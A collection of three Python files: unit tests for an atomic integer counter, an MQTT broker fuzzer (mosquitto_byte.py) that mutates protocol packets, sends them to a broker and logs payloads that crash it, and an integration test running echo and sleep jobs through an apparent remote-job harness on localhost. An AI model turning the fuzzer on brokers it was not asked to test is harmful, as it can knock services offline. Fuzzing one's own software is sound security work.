atomicintegerincrementer__base_type__('asdf')
assert 'is not a valid initial value' in str(ve)
class TestAtomicIntegerIncrementer:
def test_increments_on_access(self, cleanup: AtomicVariableCleanupFixture) -> None:
try:
t = AtomicIntegerIncrementer('message_id', 1)
assert t['message_id'] == 1
assert t['message_id'] == 2
t = AtomicIntegerIncrementer('test', '0 | step=10')
assert len(t._steps.keys()) == 2
assert 'message_id' in t._steps
assert 'test' in t._steps
assert t['test'] == 0
assert t['test'] == 10
assert t['test'] == 20
finally:
cleanup()
def test_clear_and_destory(self, cleanup: AtomicVariableCleanupFixture) -> None:
try:
try:
AtomicIntegerIncrementer.destroy()
except Exception:
pass
with pytest.raises(ValueError):
AtomicIntegerIncrementer.destroy()
with pytest.raises(ValueError):
AtomicIntegerIncrementer.clear()
instance = AtomicIntegerIncrementer('dummy', '1|step=10')
assert len(instance._values.keys()) == 1
assert len(instance._steps.keys()) == 1
AtomicIntegerIncrementer.clear()
assert len(instance._values.keys()) == 0
assert len(instance._steps.keys()) == 0
AtomicIntegerIncrementer.destroy()
with pytest.raises(ValueError):
AtomicIntegerIncrementer.destroy()
finally:
cleanup()
def test_no_redefine_value(self, cleanup: AtomicVariableCleanupFixture) -> None:
try:
t = AtomicIntegerIncrementer('message_id', 3)
t['message_id'] = 1
assert t['message_id'] == 3
del t['message_id']
del t['message_id']
finally:
cleanup()
def test_increments_with_step(self, cleanup: AtomicVariableCleanupFixture) -> None:
try:
t = AtomicIntegerIncrementer('message_id', '4 | step=10')
t = AtomicIntegerIncrementer('test', '10 | step=20')
assert t['message_id'] == 4
assert t['message_id'] == 14
assert t['test'] == 10
assert t['test'] == 30
del t['message_id']
del t['test']
with pytest.raises(ValueError):
AtomicIntegerIncrementer('test', '| step=10')
with pytest.raises(ValueError):
AtomicIntegerIncrementer('test', 'asdf | step=10')
with pytest.raises(ValueError):
AtomicIntegerIncrementer('test', '10 | step=asdf')
with pytest.raises(ValueError):
AtomicIntegerIncrementer('test', '0xFF | step=0x01')
finally:
cleanup()
def test_json_serializable(self, cleanup: AtomicVariableCleanupFixture) -> None:
try:
t = AtomicIntegerIncrementer('message_id', 1)
jsondumps(t['message_id'])
finally:
cleanup()
def test_multi_thread(self, cleanup: AtomicVariableCleanupFixture) -> None:
try:
start_value: int = 2
num_threads: int = 20
num_iterations: int = 1001
expected_value = start_value + num_threads * num_iterations
t = AtomicIntegerIncrementer('thread_var', start_value)
values: Set[int] = set()
def func1() -> None:
for _ in range(num_iterations):
value = t.__getitem__('thread_var')
assert value is not None
assert value > start_value - 1
assert value not in values
values.add(value)
threads: List[threading.Thread] = []
for _ in range(num_threads):
thread = threading.Thread(target=func1)
threads.append(thread)
for thread in threads:
thread.start()
for thread in threads:
thread.join()
assert t['thread_var'] == expected_value
finally:
cleanup()
def test_multi_greenlet(self, cleanup: AtomicVariableCleanupFixture) -> None:
try:
start_value: int = 2
num_threads: int = 20
num_iterations: int = 1001
expected_value = start_value + num_threads * num_iterations
t = AtomicIntegerIncrementer('greenlet_var', start_value)
values: Set[int] = set()
def exception_handler(greenlet: gevent.Greenlet) -> None:
raise RuntimeError(f'func1 did not validate for {greenlet}')
def func1() -> None:
for _ in range(num_iterations):
value = t.__getitem__('greenlet_var')
assert value is not None
assert value > start_value - 1
assert value not in values
values.add(value)
greenlets: List[Greenlet] = []
for _ in range(num_threads):
greenlet = gevent.spawn(func1)
greenlet.link_exception(exception_handler)
greenlets.append(greenlet)
try:
gevent.joinall(greenlets)
for greenlet in greenlets:
greenlet.get()
except RuntimeError as e:
pytest.fail(str(e))
assert len(values) == num_threads * num_iterations
assert t['greenlet_var'] == expected_value
finally:
cleanup()
|
mosquitto_byte.py
|
import socket
import random
import time
import sys
import argparse
import math
import os
import os.path
import select
import subprocess
import difflib
import threading
from os import path
from datetime import datetime
from difflib import SequenceMatcher
# Remove bytes in a string
# f : the fuzzable object
# nb : the number of bytes to remove in f
def remove(f, nb):
for n in range(nb):
base = random.randint(0, len(f))
f = f[0:base] + f[base + 1:]
return f
# Add bytes in a string
# f : the fuzzable object
# nb : the number of bytes to add to f
def add(f, nb):
for n in range(nb):
base = random.randint(0, len(f))
byte = random.getrandbits(8).to_bytes(1, sys.byteorder)
f = f[0:base] + byte + f[base:]
return f
# Mutate bytes in a string
# f : the fuzzable object
# nb : the number of bytes to mutate in f
def mutate(f, nb):
bits = random.sample(range(len(f)), min(nb, len(f)))
for b in bits:
byte = random.getrandbits(8).to_bytes(1, sys.byteorder)
f = f[0:b] + byte + f[b + 1:]
return f
def get_payload(file):
f = open(file, "r")
packets = f.read().splitlines()
selection = random.choice(packets)
f.close()
return bytearray.fromhex(selection)
def get_all_payloads():
all_payloads = {
"connect": get_payload("mqtt_corpus/CONNECT"),
"connack": get_payload("mqtt_corpus/CONNACK"),
"pingreq": get_payload("mqtt_corpus/PINGREQ"),
"pingresp": get_payload("mqtt_corpus/PINGRESP"),
"auth": get_payload("mqtt_corpus/AUTH"),
"publish": get_payload("mqtt_corpus/PUBLISH"),
"puback": get_payload("mqtt_corpus/PUBACK"),
"pubrec": get_payload("mqtt_corpus/PUBREC"),
"pubrel": get_payload("mqtt_corpus/PUBREL"),
"pubcomp": get_payload("mqtt_corpus/PUBCOMP"),
"subscribe": get_payload("mqtt_corpus/SUBSCRIBE"),
"suback": get_payload("mqtt_corpus/SUBACK"),
"unsubscribe": get_payload("mqtt_corpus/UNSUBSCRIBE"),
"unsuback": get_payload("mqtt_corpus/UNSUBACK"),
"disconnect": get_payload("mqtt_corpus/DISCONNECT"),
"reserved": get_payload("mqtt_corpus/RESERVED")
}
return all_payloads
# Return c / 100 * len(f), where c is a random number between a and b
# a : a number between 0 and 100
# b : a number between a and 100
# f : the fuzzable object
def select_param_value(f, a, b):
if a == b:
c = round(a / 100 * len(f))
else:
c = random.choice(range(a, b))
c = round(c / 100 * len(f))
return c
def fuzz_target(f, params):
# Get number of bytes to mutate
num_mutate_bytes = select_param_value(f, params["min_mutate"], params["max_mutate"])
# Get number of bytes to add
if params["super_add_enable"] == 0:
num_add_bytes = random.randint(params["super_add_min"], params["super_add_max"])
else:
num_add_bytes = select_param_value(f, params["min_add"], params["max_add"])
# Get number of bytes to remove
num_remove_bytes = select_param_value(f, params["min_remove"], params["max_remove"])
# Randomize which operations we do
fuzz_opts = ["mutate", "add", "remove"]
fuzz_rounds = random.randint(params["min_fuzz_rounds"], params["max_fuzz_rounds"])
for fr in range(fuzz_rounds):
fuzz_selection = random.sample(fuzz_opts, random.randint(1, 3))
for s in fuzz_selection:
if s == "mutate":
f = mutate(f, num_mutate_bytes)
elif s == "add":
f = add(f, num_add_bytes)
elif s == "remove":
f = remove(f, num_remove_bytes)
return f
def source_payload_with_filestream_response(params):
f = open(output_directory + "/filestream_responses.txt", "r")
packets = f.readlines()[1:]
selection_index = random.randint(0, len(packets) - 1)
selection = packets[selection_index].split(",")[1]
payload = bytearray.fromhex(selection)
f.close()
return fuzz_target(payload, params), selection_index
def source_payload_with_network_response(params):
f = open(output_directory + "/network_responses.txt", "r")
packets = f.read().splitlines()[1:]
selection_index = random.randint(0, len(packets) - 1)
selection = packets[selection_index].split(",")[1]
payload = bytearray.fromhex(selection)
f.close()
return fuzz_target(payload, params), selection_index
def source_payload_with_crash(params):
f = open(output_directory + "/crashes.txt", "r")
packets = f.read().splitlines()[1:]
selection_index = random.randint(0, len(packets) - 1)
selection = packets[selection_index].split(",")[11]
payload = bytearray.fromhex(selection)
f.close()
return fuzz_target(payload, params), selection_index
# Return a tuple (a, b) where a and b are between abs_min and abs_max and a <= b
def get_min_max(abs_min, abs_max):
a = random.randint(abs_min, abs_max)
b = random.randint(abs_min, abs_max)
if a < b:
return (a, b)
return (b, a)
def get_params():
min_mutate, max_mutate = get_min_max(0, 10 * fuzz_intensity)
min_add, max_add = get_min_max(0, 10 * fuzz_intensity)
super_add_min, super_add_max = get_min_max(0, 1000 * fuzz_intensity)
super_add_enable = random.randint(0, 50)
min_remove, max_remove = get_min_max(0, 10 * fuzz_intensity)
min_fuzz_rounds, max_fuzz_rounds = get_min_max(0, fuzz_intensity)
# However non-intuitive, a sourcing value of 0 means that the fuzzer WILL source from that target. For example, if sourcing_from_crash = 0 (i.e., source_frequency = 4), then we will source from the crashes log.
if source_frequency == 0:
sourcing_from_crash = 1
elif source_frequency == 1:
sourcing_from_crash = random.randint(0, 100)
elif source_frequency == 2:
sourcing_from_crash = random.randint(0, 10)
elif source_frequency == 3:
sourcing_from_crash = random.randint(0, 1)
else:
sourcing_from_crash = 0
if network_response_frequency == 0:
sourcing_from_network = 1
elif network_response_frequency == 1:
sourcing_from_network = random.randint(0, 100)
elif network_response_frequency == 2:
sourcing_from_network = random.randint(0, 10)
elif network_response_frequency == 3:
sourcing_from_network = random.randint(0, 1)
else:
sourcing_from_network = 0
if filestream_response_frequency == 0:
sourcing_from_filestream = 1
elif filestream_response_frequency == 1:
sourcing_from_filestream = random.randint(0, 100)
elif filestream_response_frequency == 2:
sourcing_from_filestream = random.randint(0, 10)
elif filestream_response_frequency == 3:
sourcing_from_filestream = random.randint(0, 1)
else:
sourcing_from_filestream = 0
params = {
"min_mutate": min_mutate,
"max_mutate": max_mutate,
"min_add": min_add,
"max_add": max_add,
"super_add_enable": super_add_enable,
"super_add_min": super_add_min,
"super_add_max": super_add_max,
"min_remove": min_remove,
"max_remove": max_remove,
"min_fuzz_rounds": min_fuzz_rounds,
"max_fuzz_rounds": max_fuzz_rounds,
"sourcing_from_crash": sourcing_from_crash,
"sourcing_from_network": sourcing_from_network,
"sourcing_from_filestream": sourcing_from_filestream
}
return params
def check_duplicate_source(payload):
f = open(output_directory + "/crashes.txt", "r")
packets = f.read().splitlines()[1:]
f.close()
for p in packets:
curr = p.split(",")[11].strip(" ")
if payload.hex() == curr:
return True
return False
# Check for duplicate responses in the broker response log.
# This includes responses that are too similar, but not exactly
# duplicates.
def check_duplicate_network_response(response):
if not path.exists(output_directory + "/network_responses_raw.txt"):
return False
f = open(output_directory + "/network_responses_raw.txt", "r")
packets = f.read().splitlines()
f.close()
for p in packets:
similarity = SequenceMatcher(None, p, response.hex()).ratio()
if similarity >= max_network_response_threshold:
return True
return False
# Check for duplicate responses in the stream response log.
# This includes responses that are too similar, but not exactly
# duplicates.
def check_duplicate_filestream_response(response):
if not path.exists(output_directory + "/filestream_responses_raw.txt"):
return False
f = open(output_directory + "/filestream_responses_raw.txt", "r")
packets = f.read().splitlines()
f.close()
for p in packets:
similarity = SequenceMatcher(None, p, response).ratio()
if similarity >= max_filestream_response_threshold:
return True
return False
def get_last_index():
try:
f = open(output_directory + "/crashes.txt", "r")
last_entry = f.read().splitlines()[-1]
last_index = last_entry.split(",")[0]
f.close()
return int(last_index)
except (FileNotFoundError, ValueError):
return -1
def handle_network_response(payload, response):
if not path.exists(output_directory + "/network_responses.txt"):
f = open(output_directory + "/network_responses.txt", "w")
f.write("Timestamp, Payload, Response\n")
f.close()
duplicate_response = check_duplicate_network_response(response)
f = open(output_directory + "/network_responses.txt", "r")
f_len = len(f.read().splitlines())
f.close()
if not duplicate_response and f_len < max_network_response_entries:
f = open(output_directory + "/network_responses.txt", "a")
f.write("%s, %s, %s\n" % (datetime.now(), payload.hex(), response.hex()))
f.close()
f = open(output_directory + "/network_responses_raw.txt", "a")
f.write("%s\n" % response.hex())
f.close()
def stream_response_has_keyword(resp, payload):
f = open("keywords.txt", "r")
keywords = f.read().splitlines()
for k in keywords:
if k.upper() in resp.upper():
return True
return False
def handle_filestream_response(proc):
if not path.exists(output_directory + "/filestream_responses.txt"):
f = open(output_directory + "/filestream_responses.txt", "w")
f.write("Timestamp, Payload, Response\n")
f.close()
for line in iter(proc.stdout.readline, b''):
# Remove in-line EOL characters
line = line.decode("latin").replace(r"\n", "").replace(r"\r", "")
if "current_payload" in globals():
has_keyword = stream_response_has_keyword(line, current_payload)
duplicate_response = check_duplicate_filestream_response(line)
logging_check = True
if filestream_logging_preference < 2:
logging_check = filestream_logging_preference & has_keyword
if logging_check and not duplicate_response:
f = open(output_directory + "/filestream_responses.txt", "a")
f.write("%s, %s, %s" % (datetime.now(), current_payload.hex(), line))
f.close()
f = open(output_directory + "/filestream_responses_raw.txt", "a")
f.write(line)
f.close()
def start_broker():
try:
proc = subprocess.Popen(broker_exe.split(), stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
if not no_filestream_response_log:
broker_thread = threading.Thread(target=handle_filestream_response, args=(proc,))
broker_thread.start()
if verbosity >= 1:
print("Waiting for broker to start")
while True:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.connect((host, port))
s.close()
break
except ConnectionRefusedError:
time.sleep(0.1)
except FileNotFoundError:
print("The broker command/location you provided does not exist.")
exit()
def handle_crash():
if "last_fuzz" not in globals():
if verbosity >= 5:
print("There was an error connecting to the broker.")
try:
start_broker()
except NameError:
print("No MQTT process appears to be running at %s:%s, and you have not defined a broker exe. You must do one or the other." % (host, port))
exit()
else:
if not path.exists(output_directory + "/crashes.txt"):
f = open(output_directory + "/crashes.txt", "w")
f.write("Index, Timestamp, Seed, Fuzz intensity, Construct intensity, Crash index, Network response index, Filestream response index, Crash source frequency, Network source frequency, Filestream source frequency, Payload\n")
f.close()
seed = last_fuzz["seed"]
fi = last_fuzz["fuzz_intensity"]
ci = last_fuzz["construct_intensity"]
si = last_fuzz["crash_index"]
nri = last_fuzz["network_response_index"]
fri = last_fuzz["filestream_response_index"]
sf = last_fuzz["source_frequency"]
nrf = last_fuzz["network_response_frequency"]
frf = last_fuzz["filestream_response_frequency"]
payload = last_fuzz["payload"]
if verbosity >= 1:
print("The following payload crashed the program")
print(payload.hex())
index = get_last_index() + 1
duplicate_source = check_duplicate_source(payload)
if not duplicate_source:
f = open(output_directory + "/crashes.txt", "a")
f.write("%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s\n" % (index, datetime.now(), seed, fi, ci, si, nri, fri, sf, nrf, frf, payload.hex()))
f.close()
f = open(output_directory + "/crashes_raw.txt", "a")
f.write("%s\n" % payload.hex())
f.close()
if not restart_on_crash:
exit()
else:
start_broker()
# Construct the payload according the construct intensity
def construct_payload(all_payloads):
selected_payloads = []
if construct_intensity == 0:
allowed_payloads = ["auth", "pingreq", "pubcomp", "publish", "pubrec", "pubrel", "subscribe", "unsubscribe"]
payloads_subset = {e: all_payloads[e] for e in allowed_payloads}
selected_payloads.append("connect")
key, val = random.choice(list(payloads_subset.items()))
selected_payloads.append(key)
selected_payloads.append("disconnect")
elif construct_intensity == 1:
allowed_payloads = ["auth", "pingreq", "pubcomp", "publish", "pubrec", "pubrel", "subscribe", "unsubscribe"]
payloads_subset = {e: all_payloads[e] for e in allowed_payloads}
num_packets = random.randint(1, 5)
selected_payloads = dict(random.sample(list(payloads_subset.items()), num_packets)).keys()
elif construct_intensity == 2:
num_packets = random.randint(1, 10)
selected_payloads = dict(random.sample(list(all_payloads.items()), num_packets)).keys()
else:
num_packets = random.randint(1, 20)
for n in range(num_packets):
key, val = random.choice(list(all_payloads.items()))
selected_payloads.append(key)
enumerated_payloads = {}
payload = b""
for s in selected_payloads:
payload = payload + all_payloads[s]
enumerated_payloads[s] = all_payloads[s]
return (payload, enumerated_payloads)
def fuzz_payloads(all_payloads, params):
for a in all_payloads:
all_payloads[a] = fuzz_target(all_payloads[a], params)
return all_payloads
# Fuzz MQTT
c_len = -1
nr_len = -1
fr_len = -1
def fuzz(seed):
global last_fuzz, current_payload, c_len, nr_len, fr_len
random.seed(seed)
params = get_params()
if c_len < 2:
# Get number of entries in crash file so far
try:
f = open(output_directory + "/crashes.txt", "r")
c_len = len(f.read().splitlines())
f.close()
except FileNotFoundError:
c_len = -1
if nr_len < 2:
# Get number of entries in network response file so far
try:
f = open(output_directory + "/network_responses.txt", "r")
nr_len = len(f.read().splitlines())
f.close()
except FileNotFoundError:
nr_len = -1
if fr_len < 2:
# Get number of entries in filestream response file so far
try:
f = open(output_directory + "/filestream_responses.txt", "r")
fr_len = len(f.read().splitlines())
f.close()
except FileNotFoundError:
fr_len = -1
crash_index = None
network_response_index = None
filestream_response_index = None
# Order of preference for sourcing: crash log > filestream log > network log
# Don't source the fuzzer with anything
if (c_len < 2 or not params["sourcing_from_crash"] == 0) and (nr_len < 2 or not params["sourcing_from_network"] == 0) and (fr_len < 2 or not params["sourcing_from_filestream"] == 0):
all_payloads = fuzz_payloads(get_all_payloads(), params)
payload, enumerated_payloads = construct_payload(all_payloads)
# Source with previous crash
elif c_len >= 2 and params["sourcing_from_crash"] == 0:
payload, crash_index = source_payload_with_crash(params)
# Source with filestream response
elif fr_len >= 2 and params["sourcing_from_filestream"] == 0:
payload, filestream_response_index = source_payload_with_filestream_response(params)
# Source with network response
else:
payload, network_response_index = source_payload_with_network_response(params)
if payload_only:
print("\nCrash index: " + str(crash_index))
print("Network response index: " + str(network_response_index))
print("Filestream response index: " + str(filestream_response_frequency))
if not params["sourcing_from_crash"] == 0 and not params["sourcing_from_network"] == 0 and not params["sourcing_from_filestream"] == 0:
print("\nFuzzed payload:\t" + payload.hex())
for p in enumerated_payloads:
print("%s: %s" % (p, enumerated_payloads[p].hex()))
else:
print("\nFuzzed payload:\t" + payload.hex())
exit()
current_payload = payload
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.connect((host, port))
s.send(payload)
except ConnectionRefusedError:
handle_crash()
return
except ConnectionResetError:
return
if(verbosity >= 4):
print("Crash log index:\t", crash_index)
print("Network log index:\t", network_response_index)
print("Filestream log index:\t", filestream_response_index)
if(verbosity >= 1):
print("Fuzzed payload:\t\t", payload.hex())
ready = select.select([s], [], [], response_delay)
if ready[0]:
try:
response = s.recv(1024)
if not no_network_response_log:
handle_network_response(payload, response)
if verbosity >= 5:
print("Network response:\t", response.hex())
except ConnectionResetError:
if verbosity >= 4:
print("Error:\t\t\t Broker reset connection.")
else:
if verbosity >= 4:
print("Error:\t\t\tBroker was not ready for reading.")
s.close()
# Update the last fuzz params
last_fuzz = {
"seed": seed,
"fuzz_intensity": fuzz_intensity,
"construct_intensity": construct_intensity,
"crash_index": crash_index,
"network_response_index": network_response_index,
"filestream_response_index": filestream_response_index,
"source_frequency": source_frequency,
"network_response_frequency": network_response_frequency,
"filestream_response_frequency": filestream_response_frequency,
"payload": payload
}
def main(argv):
parser = argparse.ArgumentParser()
parser.add_argument("-H", "--host", help = "Fuzzing target host. Default is localhost.")
parser.add_argument("-P", "--port", help = "Fuzzing target port. Default is 1883.")
parser.add_argument("-B", "--broker_exe", help = "Set the broker exe command/location. If the broker crashes, this can be used to restart it.")
parser.add_argument("-R", "--restart_on_crash", help = "If set, the fuzzer will try to use the option provided by 'broker_exe' to restart the broker.", action = "store_true")
parser.add_argument("-s", "--seed", help = "Set the seed. If not set by the user, the system time is used as the seed.")
parser.add_argument("-fd", "--fuzz_delay", help = "Set the delay between each fuzzing attempt. Default is 0.1 seconds.")
parser.add_argument("-I", "--index", help = "Source the fuzzer using an index in the crashes.txt log file.")
parser.add_argument("-rd", "--response_delay", help="Set the delay between sending a packet and receiving the response from the broker. Default is whatever fuzz delay is set to.")
parser.add_argument("-m", "--max_runs", help = "Set the number of fuzz attempts made. If not set, the fuzzer will run until the broker crashes.")
parser.add_argument("-fi", "--fuzz_intensity", help = "Set the intensity of the fuzzer, from 0 to 10. 0 means packets are not fuzzed at all. Default is 3.")
parser.add_argument("-ci", "--construct_intensity", help = "Set the intensity of the payload constructer, from 0 to 3. The constructor decides what order to send packets. For example, 0 means all packets begin with CONNECT and end wth DISCONNECT. Default is 0.")
parser.add_argument("-sf", "--source_frequency", help = "Set the frequency of sourcing the fuzzer's input with a packet that previously triggered a crash, from 0 to 4. 0 means never source and 4 means always source. Default is 2.")
parser.add_argument("-nrf", "--network_response_frequency", help = "Set the frequency of sourcing the fuzzer's input with a packet that previously triggered a unique network response from the broker, from 0 to 4. 0 means never source and 4 means always source. Default is 2.")
parser.add_argument("-frf", "--filestream_response_frequency", help = "Set the frequency of sourcing the fuzzer's input with a packet that previously triggered an anamolous response to stdout or stderr, from 0 to 4. 0 means never source and 4 means always source. Default is 2.")
parser.add_argument("-mnt", "--max_network_response_threshold", help = "Set the maximum similarity threshold for entries in the broker response file, from 0 to 1. For example, a threshold of 0.3 means entries will be NOT logged if they are at least 30 percent similar to any other entry. Default is 0.5.")
parser.add_argument("-mft", "--max_filestream_response_threshold", help = "Set the maximum similarity threshold for entries in the filestream response file, from 0 to 1. Default is 0.5.")
parser.add_argument("-mne", "--max_network_response_entries", help = "Set the maximum number of entries allowed in the broker responses file. Fuzzer will not write to this file if the number of entries exceeds this value. Default is 150.")
parser.add_argument("-flp", "--filestream_logging_preference", help = "Set the preference of logging stdout/stderr responses from the broker. 0 means exclude responses that contain keywords in the keywords.txt file. 1 means exclude responses that do not contain keywords. 2 means do not exclude any responses. Default is 2.")
parser.add_argument("-nnl", "--no_network_response_log", help = "If set, do not log network responses from the broker.", action="store_true")
parser.add_argument("-nfl", "--no_filestream_response_log", help="If set, do not log filestream responses from the broker.", action="store_true")
parser.add_argument("-afi", "--auto_fuzz_intensity", help = "If set, the fuzz intensity changes randomly every run.", action="store_true")
parser.add_argument("-aci", "--auto_construct_intensity", help="If set, the construct intensity changes randomly every run.", action="store_true")
parser.add_argument("-v", "--verbosity", help = "Set verbosity, from 0 to 5. 0 means nothing is printed. Default is 1.")
parser.add_argument("-p", "--payload_only", help = "Do not fuzz. Simply return the payload before and after it is fuzzed. Also return the params.", action = "store_true")
parser.add_argument("-rp", "--repeat_payload", help = "Send the same payload over and over again. This essentially just keeps the seed at a fixed value.", action = "store_true")
parser.add_argument("-O", "--output_directory", help = "Set the output directory for files generated by the fuzzer. Default is 'outputs.")
args = parser.parse_args()
global host, port, broker_exe, fuzz_intensity, construct_intensity, source_frequency, network_response_frequency, filestream_response_frequency, construct_payload, payload_only, verbosity, response_delay, restart_on_crash, no_network_response_log, no_filestream_response_log, max_network_response_entries, max_network_response_threshold, max_filestream_response_threshold, output_directory, output_directory, filestream_logging_preference
if(args.host):
host = args.host
else:
host = "localhost"
if(args.port):
port = int(args.port)
else:
port = 1883
if args.output_directory:
output_directory = args.output_directory
else:
output_directory = "outputs"
if not path.exists(output_directory):
os.mkdir(output_directory)
# This arg means we just source from an index in crashes.txt. Handy for verifying a crash quickly.
if args.index:
crash_index = int(args.index)
f = open(output_directory + "/crashes.txt", "r")
selected_line = f.read().splitlines()[crash_index + 1].split(",")
f.close()
seed = int(selected_line[2])
fuzz_intensity = int(selected_line[3])
construct_intensity = int(selected_line[4])
source_frequency = int(selected_line[8])
network_response_frequency = int(selected_line[9])
filestream_response_frequency = int(selected_line[10])
else:
if(args.seed):
seed = int(args.seed)
else:
seed = math.floor(time.time())
if(args.fuzz_intensity):
fuzz_intensity = int(args.fuzz_intensity)
if fuzz_intensity > 10:
fuzz_intensity = 10
if fuzz_intensity < 0:
fuzz_intensity = 0
else:
fuzz_intensity = 3
if(args.construct_intensity):
construct_intensity = int(args.construct_intensity)
if construct_intensity > 3:
construct_intensity = 3
if construct_intensity < 0:
construct_intensity = 0
else:
construct_intensity = 0
if(args.source_frequency):
source_frequency = int(args.source_frequency)
if source_frequency < 0:
source_frequency = 0
if source_frequency > 4:
source_frequency = 4
else:
source_frequency = 2
if(args.network_response_frequency):
network_response_frequency = int(args.network_response_frequency)
if network_response_frequency < 0:
network_response_frequency = 0
if network_response_frequency > 4:
network_response_frequency = 4
else:
network_response_frequency = 2
if(args.filestream_response_frequency):
filestream_response_frequency = int(args.filestream_response_frequency)
if filestream_response_frequency < 0:
filestream_response_frequency = 0
if filestream_response_frequency > 4:
filestream_response_frequency = 4
else:
filestream_response_frequency = 2
if(args.fuzz_delay):
fuzz_delay = float(args.fuzz_delay)
else:
fuzz_delay = 0.1
if(args.response_delay):
response_delay = float(args.response_delay)
else:
response_delay = fuzz_delay
if(args.max_runs):
max_runs = int(args.max_runs)
if(args.auto_fuzz_intensity):
auto_fuzz_intensity = True
else:
auto_fuzz_intensity = False
if(args.auto_construct_intensity):
auto_construct_intensity = True
else:
auto_construct_intensity = False
if(args.verbosity):
verbosity = int(args.verbosity)
if verbosity > 5:
verbosity = 5
if verbosity < 0:
verbosity = 0
else:
verbosity = 1
if(args.no_network_response_log):
no_network_response_log = True
else:
no_network_response_log = False
if(args.no_filestream_response_log):
no_filestream_response_log = True
else:
no_filestream_response_log = False
if(args.max_network_response_entries):
max_network_response_entries = int(args.max_network_response_entries)
else:
max_network_response_entries = 150
if(args.max_network_response_threshold):
max_network_response_threshold = float(args.max_network_response_threshold)
if max_network_response_threshold < 0:
max_network_response_threshold = 0
if max_network_response_threshold > 1:
max_network_response_threshold = 1
else:
max_network_response_threshold = 0.5
if(args.max_filestream_response_threshold):
max_filestream_response_threshold = float(args.max_filestream_response_threshold)
if max_filestream_response_threshold < 0:
max_filestream_response_threshold = 0
if max_filestream_response_threshold > 1:
max_filestream_response_threshold = 1
else:
max_filestream_response_threshold = 0.5
if(args.filestream_logging_preference):
filestream_logging_preference = int(args.filestream_logging_preference)
if filestream_logging_preference < 0:
filestream_logging_preference = 0
if filestream_logging_preference > 2:
filestream_logging_preference = 2
else:
filestream_logging_preference = 2
if(args.payload_only):
payload_only = True
random.seed(seed)
params = get_params()
print("\nYour params: ", params)
else:
payload_only = False
if args.broker_exe and not payload_only:
broker_exe = args.broker_exe
start_broker()
time.sleep(0.1)
if(args.restart_on_crash):
restart_on_crash = True
if "broker_exe" not in globals():
print("You cannot restart on crash if the broker exe is not defined.")
exit()
else:
restart_on_crash = False
print("Hello fellow fuzzer :)")
print("Host: %s, Port: %d" % (host, port))
print("Base seed: ", seed)
print("Fuzz Intensity: ", fuzz_intensity)
print("Construct intensity: ", construct_intensity)
print("Source frequency: ", source_frequency)
print("Network response frequency: ", network_response_frequency)
print("Filestream response frequency: ", filestream_response_frequency)
print("\n")
total_runs = 1
while True:
if verbosity >= 1 and not payload_only:
print("\nRun:\t\t\t", total_runs)
if verbosity >= 3:
print("Seed:\t\t\t", seed)
if verbosity >= 4:
print("Fuzz intensity:\t\t", fuzz_intensity)
print("Construct intensity:\t", construct_intensity)
fuzz(seed)
time.sleep(fuzz_delay)
total_runs += 1
if not args.repeat_payload:
seed += 1
if 'max_runs' in locals():
max_runs -= 1
if max_runs <= 0:
exit()
if auto_fuzz_intensity and not args.repeat_payload:
fuzz_intensity = random.randint(0, 10)
if auto_construct_intensity and not args.repeat_payload:
construct_intensity = random.randint(0, 3)
if __name__ == "__main__":
main(sys.argv[1:])
|
test_linharn.py
|
from pytest import raises, fixture
from os import environ
from time import sleep, time
from copy import deepcopy
from multiprocessing import Process
import brain
import docker
from Harness_client import linharn
CLIENT = docker.from_env()
class Linharn_proc:
def __init__(self):
self.procs = []
def add_proc(self, func_):
self.procs.append(Process(target=func_))
return self.procs[-1]
@staticmethod
def wrap_loop():
client_info = "C_127.0.0.1_1"
linharn.control_loop(client_info)
SAMPLE_TARGET = {
"PluginName": "Harness",
"Location": "127.0.0.1",
"Port": "5000"
}
@fixture(scope="module")
def startup_brain():
old_log = environ.get("LOGLEVEL", "")
environ["LOGLEVEL"] = "DEBUG"
tag = environ.get("TRAVIS_BRANCH", "dev").replace("master", "latest")
CLIENT.containers.run(
"".join(("ramrodpcp/database-brain:", tag)),
name="rethinkdbtestapp",
detach=True,
ports={"28015/tcp": 28015},
remove=True,
)
sleep(3) #docker needs to start up the DB
yield
try:
environ["LOGLEVEL"] = old_log
containers = CLIENT.containers.list()
for container in containers:
if container.name == "rethinkdbtestapp":
container.stop()
break
except SystemExit:
pass
@fixture(scope="function")
def proc():
old_plugin = environ.get("PLUGIN", "")
old_plugin_name = environ.get("PLUGIN_NAME", "")
old_stage = environ.get("STAGE", "")
old_port = environ.get("PORT", "")
environ["PLUGIN"] = "Harness"
environ["PLUGIN_NAME"] = "Harness-5000tcp"
environ["STAGE"] = "TESTING"
environ["PORT"] = "5000"
import server
plugin_instance = server.get_class_instance("Harness")
sleep(5)
process = Process(target=plugin_instance.start)
yield process
try:
process.terminate()
except:
pass
environ["PLUGIN"] = old_plugin
environ["PLUGIN_NAME"] = old_plugin_name
environ["STAGE"] = old_stage
environ["PORT"] = old_port
@fixture
def linux_harn(scope="function"):
proc_list = Linharn_proc()
yield proc_list
for proc in proc_list.procs:
try:
proc.terminate()
except:
pass
def test_linharn(startup_brain, proc, linux_harn):
# create the processes that will contact the Harness plugin
linux_harn.add_proc(Linharn_proc.wrap_loop)
# start the Harness plugin
proc.start()
while not proc.is_alive():
sleep(.5)
# start linux client
linux_harn.procs[0].start()
sleep(3)
# insert an echo job into database
echo = brain.queries.get_plugin_command("Harness", "echo", brain.connect())
echo_job = {
"Status" : "Waiting",
"StartTime": time(),
"JobTarget": SAMPLE_TARGET,
"JobCommand": echo
}
echo_job["JobCommand"]["Inputs"][0]["Value"] = "Hello World"
inserted = brain.queries.insert_jobs([echo_job], True, brain.connect())
loop = True
now = time()
# wait for the client to complete the job and get the result
while time() - now < 30 and loop is True:
out = brain.queries.get_output_content(inserted["generated_keys"][0], conn=brain.connect())
if out is not None:
loop = False
sleep(1)
assert out == "Hello World"
# insert a sleep job
sleep_job = {
"Status" : "Waiting",
"StartTime": time(),
"JobTarget": SAMPLE_TARGET,
"JobCommand": brain.queries.get_plugin_command("Harness", "sleep", brain.connect())
}
sleep_job["JobCommand"]["Inputs"][0]["Value"] = "3000"
inserted = brain.queries.insert_jobs([sleep_job], True, brain.connect())
loop = True
now = time()
# wait for the client to complete the job and get the result
while time() - now < 30 and loop is True:
out = brain.queries.get_output_content(inserted["generated_keys"][0], conn=brain.connect())
if out is not None:
loop = False
sleep(1)
assert out == ""
